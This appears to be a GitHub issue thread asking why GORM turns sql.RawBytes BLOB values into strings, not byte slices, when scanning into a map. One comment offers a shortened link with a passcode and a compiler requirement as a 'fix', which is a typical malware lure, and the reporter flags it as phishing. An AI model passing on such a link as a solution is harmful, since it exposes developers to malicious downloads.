### ISSUE TITLE
Why gorm case sql.RawBytes to string when scanIntoMap?

### ISSUE THREAD

**Issue by APshenkin** [go-gorm/gorm#7189]
## Description
I find out that GORM cast byte arrays to strings, if `ColumnTypeScanType` returns sql.RawBytes.
 https://github.com/go-gorm/gorm/blob/0daaf1747cfa4e4850376ad50a7834fb78b0cc0e/scan.go#L44

This behaviour was introduced in 2020 and actually it's not clear why it do so.

I thing it's logical that if db value is sql.RawBytes, then it should return `[]byte`, not string, because you can have arbitrary byte array there that during scanning should not change to other type.

go-sqlite return `sql.RawBytes` as type for BLOB which is https://www.sqlite.org/datatype3.html – `The value is a blob of data, stored exactly as it was input.`

But together with GORM if dest is `map[string]interface{}` we get string instead

**Comment by afreisz** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by APshenkin** [comment]
I'll not recommend anyone to open link that was posted by @afreisz . This looks like a phishing
